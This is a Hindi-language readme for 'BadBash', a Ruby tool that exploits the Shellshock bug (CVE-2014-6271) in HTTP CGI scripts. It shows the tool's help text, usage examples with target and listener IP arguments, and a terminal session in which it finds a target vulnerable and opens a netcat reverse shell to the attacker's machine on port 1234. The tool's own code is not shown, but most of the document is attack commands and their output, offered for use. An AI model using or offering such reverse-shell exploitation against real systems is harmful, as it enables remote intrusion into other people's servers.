
CVE-2014-6271 RCE tool
BadBash एक CVE-2014-6271 RCE शोषण उपकरण है। मूल संस्करण केवल HTTP CGI साइट की जाँच करता है और केवल पोर्ट 1234 पर netcat रिवर्स शेल प्रदान करता है।
डेवलपर : Andy Yang संस्करण : 0.1.0 लाइसेंस : GPLv3
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - Andy Yang द्वारा CVE-2014-6271 RCE उपकरण मूल संस्करण केवल HTTP साइट की जाँच करता है मूल संस्करण केवल पोर्ट 1234 पर netcat रिवर्स शेल प्रदान करता है
उपयोग उदाहरण:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path CGI पृष्ठ का पूर्ण पथ
-d, --Destination IP आपका IP पता जो इनबाउंड कनेक्शन को सुनता है
-h, --help सहायता प्रदर्शित करें
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] जाँच कर रहा है कि लक्ष्य कमजोर है या नहीं........
[Info] इसमें 10 सेकंड तक लग सकते हैं........
[Info] लक्ष्य कमजोर है!!!
[Info] कृपया रिवर्स शेल के लिए पोर्ट 1234 पर NC का उपयोग करें..........
[Info] netcat के माध्यम से 172.16.189.1:1234 से कनेक्ट करने के लिए रिवर्स शेल का शोषण किया जा रहा है ..........